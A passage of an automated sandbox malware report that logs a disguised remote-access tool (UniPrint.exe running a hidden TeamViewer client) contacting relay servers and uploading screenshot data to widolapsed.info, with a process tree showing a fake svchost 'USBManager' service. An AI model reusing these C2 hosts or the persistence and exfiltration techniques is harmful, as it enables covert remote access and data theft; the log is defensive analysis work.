Sep 15, 2021 14:02:04.327481985 CEST | 1211 | OUT | GET /dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6sTY0saWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAH7LQs0qhaWs0MJjaOW1RZp/s+y/yn5XEbeVZg9sKBJ5zPw4VSW4zdwQ3dPOJPU35FNkIfcILZEzewXzbzR9HNSPt0dvZIMvjxebsFa8mt4yIfhUHNJCrU/eCKZvCgbkPO7XECRgFWPWpqy/DxavH2VA1uMNeC6MgWi1tqYJlUpU HTTP/1.1
    Accept: */*
    Content-Type: application/octet-stream
    Content-Transfer-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master13.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:02:04.348402023 CEST | 1211 | IN | HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-length: 0
Sep 15, 2021 14:02:04.349881887 CEST | 1211 | OUT | GET /din.aspx?s=42047152&client=DynGate&p=10000002 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master13.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:02:04.372112036 CEST | 1211 | IN | HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-Type: application/octet-stream
    Content-length: 9
    Data Raw: 17 24 13 04 00 98 20 27 a5
    Data Ascii: $ '


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.4 | 49763 | 185.188.32.23 | 80 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 14:02:04.397053957 CEST | 1212 | OUT | GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master13.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:02:04.418442011 CEST | 1212 | IN | HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-Type: application/octet-stream
    Content-length: 10
    Data Raw: 17 24 34 32 30 34 37 31 35 39
    Data Ascii: $42047159
Sep 15, 2021 14:02:04.422777891 CEST | 1213 | OUT | GET /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU HTTP/1.1
    Accept: */*
    Content-Type: application/octet-stream
    Content-Transfer-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master13.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:02:04.443669081 CEST | 1213 | IN | HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-length: 0
Sep 15, 2021 14:02:05.181092978 CEST | 1213 | OUT | GET /din.aspx?s=42047159&client=DynGate&p=10000002 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master13.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:02:05.202090025 CEST | 1214 | IN | HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-Type: application/octet-stream
    Content-length: 9
    Data Raw: 17 24 13 04 00 98 20 27 a5
    Data Ascii: $ '


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.4 | 49764 | 185.188.32.23 | 80 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 14:02:05.470541954 CEST | 1214 | OUT | GET /din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master13.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:02:05.504560947 CEST | 1214 | IN | HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-Type: application/octet-stream
    Content-length: 10
    Data Raw: 17 24 34 32 30 34 37 32 32 34
    Data Ascii: $42047224
Sep 15, 2021 14:02:05.885689974 CEST | 1215 | OUT | GET /dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMlsrK4MLY0uzKemJMmMLczurCzsp61MJMmNLGytzmyqjy4Mp6YEyakoh6YPDKxsxoxMRwcsRmZG6+ZHJqbGhwYGxkbEyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpqTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1
    Accept: */*
    Content-Type: application/octet-stream
    Content-Transfer-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master13.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:02:05.909208059 CEST | 1215 | IN | HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-length: 0
Sep 15, 2021 14:02:06.948101997 CEST | 1216 | OUT | GET /din.aspx?s=42047224&client=DynGate&p=10000002 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master13.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:02:06.972300053 CEST | 1216 | IN | HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-Type: application/octet-stream
    Content-length: 413


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49765 | Destination IP: 188.172.235.146 | Destination Port: 80 | Process: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 14:02:07.205918074 CEST | 1217 | OUT | GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: 188.172.235.146
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:02:07.232043982 CEST | 1217 | IN | HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-Type: application/octet-stream
    Content-length: 17
    Data Raw: 17 24 66 61 73 74 31 32 32 35 31 32 36 37
    Data Ascii: $fast12251267
Sep 15, 2021 14:02:07.350502014 CEST | 1219 | OUT | POST /dout.aspx?s=12251267&p=10000002&client=DynGate HTTP/1.1
    Accept: */*
    Content-Type: application/octet-stream
    Content-Transfer-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: 188.172.235.146
    Content-Length: 500000
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49766 | Destination IP: 188.172.235.146 | Destination Port: 80 | Process: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 14:02:07.264987946 CEST | 1218 | OUT | POST /dout.aspx?s=12251267&p=10000001&client=DynGate HTTP/1.1
    Accept: */*
    Content-Type: application/octet-stream
    Content-Transfer-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: 188.172.235.146
    Content-Length: 3
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:02:07.348237038 CEST | 1218 | IN | HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-length: 0
Sep 15, 2021 14:02:07.351424932 CEST | 1219 | OUT | GET /din.aspx?s=12251267&m=fast&client=DynGate&p=10000002 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: 188.172.235.146
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:02:07.377854109 CEST | 1219 | IN | HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-Type: application/octet-stream
    Content-length: 500000
    Data Raw: 17 24 11 04 00 06 45 b3 a2
    Data Ascii: $E


HTTPS Proxied Packets

Session ID: 0 | Source IP: 192.168.2.4 | Source Port: 49767 | Destination IP: 45.153.241.148 | Destination Port: 443 | Process: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 12:02:08 UTC | 0 | OUT | POST /B8C631A8/ HTTP/1.1
    Content-Length: 85991
    Content-Type: multipart/form-data; boundary=--------988836371
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: widolapsed.info
    Connection: Close
    Cache-Control: no-cache
    Data Ascii: ----------988836371
        Content-Disposition: form-data; name="k"
        Content-Type: text/plain
        Content-Transfer-Encoding: binary
    Data Ascii: ----------988836371--
2021-09-15 12:02:13 UTC | 84 | IN | HTTP/1.1 200 OK
    Date: Wed, 15 Sep 2021 12:02:08 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Set-Cookie: X-Csrf-Token=ef2078fc4999dd1cbaa40acdbc5c5709bd5dfe14a1f0041797db52394cd6e5b2; expires=Thu, 15-Sep-2022 12:02:09 GMT; Max-Age=31536000; httponly
    Content-Length: 48
    Connection: close
    Content-Type: application/json; charset=UTF-8


Session ID: 1 | Source IP: 192.168.2.4 | Source Port: 49838 | Destination IP: 45.153.241.148 | Destination Port: 443 | Process: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 12:03:14 UTC | 84 | OUT | POST /B8C631A8/ HTTP/1.1
    Content-Length: 86008
    Content-Type: multipart/form-data; boundary=--------2871961252
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: widolapsed.info
    Connection: Close
    Cache-Control: no-cache
    Data Ascii: ----------2871961252
        Content-Disposition: form-data; name="k"
        Content-Type: text/plain
        Content-Transfer-Encoding: binary
                                                                                                                  Data Ascii: ----------2871961252--
                                                                                                                  2021-09-15 12:03:27 UTC | 168 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 15 Sep 2021 12:03:15 GMT
                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                  Set-Cookie: X-Csrf-Token=667a5337f302a9acbfdf6c17f4438ea697df523d5032981d2884c12523352bbc; expires=Thu, 15-Sep-2022 12:03:15 GMT; Max-Age=31536000; httponly
                                                                                                                  Content-Length: 48
                                                                                                                  Connection: close
                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                  2021-09-15 12:03:27 UTC169INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                                  Data Ascii: y80aRR64VR1K\!~v]


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                  2 | 192.168.2.4 | 49843 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                  2021-09-15 12:04:29 UTC | 169 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                  Content-Length: 85958
                                                                                                                  Content-Type: multipart/form-data; boundary=--------2035396243
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                  Host: widolapsed.info
                                                                                                                  Connection: Close
                                                                                                                  Cache-Control: no-cache
                                                                                                                  2021-09-15 12:04:29 UTC169OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 30 33 35 33 39 36 32 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                  Data Ascii: ----------2035396243Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                  2021-09-15 12:04:29 UTC169OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 4e 6a 5d 99 f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 72 b6 30 f2 ed 9b 03 ed 45 5f a0 e5 48 07 ab 35 be 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c cd ac 70 2f 59 25 3d 2e 40 e8 7b
                                                                                                                  Data Ascii: iPS4\DB.Nj]{Ower0E_H5f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,p/Y%=.@{
                                                                                                                  2021-09-15 12:04:29 UTC169OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                  Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                  2021-09-15 12:04:29 UTC185OUTData Raw: 63 fc 28 fe c9 b7 fe fc bf 98 ff 00 0a db ea b5 0c 3e b5 4c c6 a2 b6 bf b2 6d ff 00 bf 2f e6 3f c2 8f ec 9b 7f ef cb f9 8f f0 a7 f5 6a 81 f5 aa 66 2d 18 ad 9f ec 9b 7f ef cb f9 8f f0 aa d7 f6 31 5b 40 af 1b 39 25 b1 f3 11 e8 6a 65 87 9c 55 d9 51 c4 42 4e c8 ce c5 18 a5 a0 d6 06 e3 68 a5 a2 80 12 8a 5a 31 4a c0 25 14 b8 a4 c5 16 18 51 46 28 a2 c0 14 51 45 00 14 b4 95 a3 a7 68 7a a6 a9 0b 4b a7 d9 bc e8 8d b5 8a 91 c1 eb eb 43 76 dc 2d 73 3e 92 b7 3f e1 10 f1 0f fd 02 a7 fd 3f c6 8f f8 44 3c 43 ff 00 40 a9 ff 00 4f f1 a3 9a 3d c7 ca fb 18 74 55 ed 43 47 d4 74 c5 0d 7d 69 24 21 8e 01 6c 75 eb 8e 3e b5 4a 9a 77 13 d0 4a 5a 4a 28 10 b4 51 45 00 14 54 f6 76 b3 de dd 25 b5 ac 66 49 a4 38 55 04 73 de b5 7f e1 10 f1 0f fd 02 a6 fc c7 f8 d0 e4 96 e0 93 7b 18 74 b5
                                                                                                                  Data Ascii: c(>Lm/?jf-1[@9%jeUQBNhZ1J%QF(QEhzKCv-s>??D<C@O=tUCGt}i$!lu>JwJZJ(QETv%fI8Us{t
                                                                                                                  2021-09-15 12:04:29 UTC201OUTData Raw: 9f b5 43 b3 31 e8 ad 36 d2 cf f0 b0 35 0b e9 f3 2f 45 cd 35 52 3d c2 cc a7 45 4c d6 d2 af 54 3f 95 44 51 87 50 6a d3 4c 42 51 46 28 a6 01 4b 49 45 02 1d 4b 9a 6d 28 a0 43 aa 7b e3 ff 00 14 d3 7f d7 51 55 c5 4d 7e 7f e2 9a 61 ff 00 4d 85 61 88 d9 1b e1 fe 33 86 34 52 9a 92 de da e2 e5 ca 5b 41 2c cc 06 e2 b1 a1 62 07 af 1f 5a f2 cf 68 8a 8a b5 fd 99 a8 7f cf 85 d7 fd f9 6f f0 a5 fe cc d4 3f e7 c6 eb fe fc b7 f8 53 b3 15 d1 52 8a b7 fd 99 a8 7f cf 8d d7 fd f9 6f f0 a4 fe cc d4 3f e7 c6 eb fe fc b7 f8 51 66 3b a2 ad 15 6f fb 33 50 3d 2c 2e bf ef cb 7f 85 41 3c 13 5b 49 e5 dc 43 24 4e 3f 85 d4 a9 fc 8d 01 72 3a 28 a2 90 05 14 51 40 05 14 51 4c 02 8a 28 a0 02 8a 28 a0 02 96 92 94 50 01 45 14 50 20 a5 a4 a5 a6 01 4b 49 4a 28 01 69 45 02 96 a9 22 5b 17 14 62 96
                                                                                                                  Data Ascii: C165/E5R=ELT?DQPjLBQF(KIEKm(C{QUM~aMa34R[A,bZho?SRo?Qf;o3P=,.A<[IC$N?r:(Q@QL((PEP KIJ(iE"[b
                                                                                                                  2021-09-15 12:04:29 UTC217OUTData Raw: 8c 57 f1 18 99 a5 a4 a3 e9 5b 9c c2 e6 8a 4a 5e 68 04 28 34 e1 4d c5 38 54 96 85 a7 0a 65 3c 52 65 21 68 a2 8a 45 21 c2 9c 29 a3 8a 70 15 2c b4 38 53 85 20 14 ec 54 b3 44 2d 2d 26 29 40 a4 ca 43 85 38 53 40 a7 0a 86 52 1c 29 d9 a6 0a 78 a4 cb 42 8a 75 34 53 aa 59 48 70 ae 1b c6 80 0b 8b 6c 7f 75 bf 9d 77 03 bd 70 de 34 ff 00 8f 9b 7f f7 1b f9 d5 52 dc 53 38 4a 4d a0 9c 9a 76 28 ac 6c 75 dc 69 45 3d a8 d8 a7 b5 3a 8a 2c 82 ec 6e c5 f4 a5 d8 3d 29 d4 51 64 2b b1 a5 14 f6 a0 46 a0 f4 a7 52 d3 b2 0b b0 a5 23 23 06 92 96 98 86 f9 6b 8c 50 10 28 c0 14 ea 28 b2 0b b1 bb 17 d2 8d 8b e9 4f a4 a2 c8 2e c6 ec 5f 4a 36 2f a5 3a 8a 2c 82 ec 6f 96 be 94 bb 17 18 c5 2d 14 59 05 d8 01 8a 6e c5 cd 3a 96 9d 85 71 9e 5a 9e a2 97 ca 4f 4a 75 2d 16 41 76 37 62 ed c6 38 a7 47
                                                                                                                  Data Ascii: W[J^h(4M8Te<Re!hE!)p,8S TD--&)@C8S@R)xBu4SYHpluwp4RS8JMv(luiE=:,n=)Qd+FR##kP((O._J6/:,o-Yn:qZOJu-Av7b8G
                                                                                                                  2021-09-15 12:04:29 UTC233OUTData Raw: 90 ed 6c bf f1 2e 75 91 b0 fc ce cb b4 02 78 e3 e5 45 5e fd 33 59 54 51 c8 83 99 93 5e 5e 5d 5f dc 9b 8b db 89 a7 7e 42 99 64 2e 54 67 38 04 f6 e6 a2 a4 a5 aa 8a 49 59 0a 4d b7 76 58 b1 bb 6b 2b a1 30 8d 25 52 ac 8f 1b e7 0e 8c 08 61 c7 23 83 d6 b4 ad 35 6d 32 ca 14 36 76 97 70 cb 1d cc 73 90 f2 2c be 78 43 90 85 b0 bb 06 79 e1 5b 27 e9 58 b4 52 94 6e 0a 56 34 6d b5 89 20 d3 2f ec 9a dc 48 2e b3 e5 be ec 34 19 65 66 c7 1c 83 b5 78 f6 cd 25 ee a1 6b 7b e6 5c 4b 61 22 df ca 3f 79 2a cf 88 d9 bb b6 cd b9 c9 ff 00 7b 19 ed da a8 51 49 53 48 6e 6d ee 5c 6d 4e 72 ba 61 88 14 93 4d 52 23 72 d9 c9 de 5c 1c 76 eb 8c 7b 54 cb a9 58 c3 7d 6f 7b 6b a5 c9 14 d1 ce 93 32 fd a7 31 f0 41 21 46 dc ae 48 ee 5b 02 b3 68 a7 c8 89 e6 66 a2 6a f1 5b 5c c2 f6 36 32 47 12 dd a5
                                                                                                                  Data Ascii: l.uxE^3YTQ^^]_~Bd.Tg8IYMvXk+0%Ra#5m26vps,xCy['XRnV4m /H.4efx%k{\Ka"?y*{QISHnm\mNraMR#r\v{TX}o{k21A!FH[hfj[\62G
                                                                                                                  2021-09-15 12:04:29 UTC249OUTData Raw: 3f 3a 00 dd a2 b9 d8 af b5 09 6d d6 13 34 91 4a 2f fe ce 5e 44 8c be c2 9b b9 0b 95 cf 3d b8 e0 7b d5 b8 0d e5 e5 e5 cc 6b 7f 2c 49 66 eb 10 c2 21 32 9d a1 8b 36 57 be 71 f2 e3 bf e0 7f 5f d7 de 06 aa 48 92 02 63 75 60 a4 a9 da 73 82 3a 8f ad 3a b9 a8 e4 ba b4 8e 6b b4 ba 22 21 a9 18 cc 01 17 6b 2b 49 b4 e4 91 9c f3 91 82 07 1d 2b a5 a1 6d 70 ea 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 55 ef ae 85 9d b8 99 94 30 32 c7 19 c9 c6 37 3a ae 73 ed bb 3f 85 00 67 c5 aa de bd 9d ad ec 96 36 eb 6d 70 62 c1 5b 96 2e 04 8c a0 7c bb 00 fe 21 9e 6b 62 b9 78 75 1b 16 f0 de 97 6a b7 b6 c6 e1 0d 98 68 84 ab bc 15 78 f7 64 67 3c 60 e7 d3 15 d0 d8 5c fd b3 4f b6 bb d9 b3 cf 89 64 db 9c ed dc 01 c6 7f 1a 00 9e be
                                                                                                                  Data Ascii: ?:m4J/^D={k,If!26Wq_Hcu`s::k"!k+I+mpQEQEQEQEQEQEQEQEQU027:s?g6mpb[.|!kbxujhxdg<`\Od
                                                                                                                  2021-09-15 12:04:29 UTC253OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 30 33 35 33 39 36 32 34 33 2d 2d 0d 0a 0d 0a
                                                                                                                  Data Ascii: ----------2035396243--
                                                                                                                  2021-09-15 12:04:45 UTC | 253 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 15 Sep 2021 12:04:29 GMT
                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                  Set-Cookie: X-Csrf-Token=de5f0361007133ed686f9f9b497f1c151344a7333ba257d61d5ad0f0db622324; expires=Thu, 15-Sep-2022 12:04:30 GMT; Max-Age=31536000; httponly
                                                                                                                  Content-Length: 48
                                                                                                                  Connection: close
                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                  2021-09-15 12:04:45 UTC253INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                                  Data Ascii: y80aRR64VR1K\!~v]


                                                                                                                  Code Manipulations

                                                                                                                  Statistics

                                                                                                                  Behavior

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Start time:14:01:48
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\Desktop\wogZe27GBB.exe'
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:1773472 bytes
                                                                                                                  MD5 hash:5EFC68ABD7FEC415E34980D95A06A66A
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low

                                                                                                                  General

                                                                                                                  Start time:14:01:51
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:4375848 bytes
                                                                                                                  MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 0%, Metadefender, Browse
                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                  Reputation:low

                                                                                                                  General

                                                                                                                  Start time:14:01:58
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:4375848 bytes
                                                                                                                  MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low

                                                                                                                  General

                                                                                                                  Start time:14:01:59
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                  Imagebase:0x7ff6eb840000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Start time:14:02:06
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager
                                                                                                                  Imagebase:0xb60000
                                                                                                                  File size:44520 bytes
                                                                                                                  MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Start time:14:02:14
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                  Imagebase:0x7ff6eb840000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Start time:14:02:17
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:4375848 bytes
                                                                                                                  MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:14:02:22
Start date: 15/09/2021
Path: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
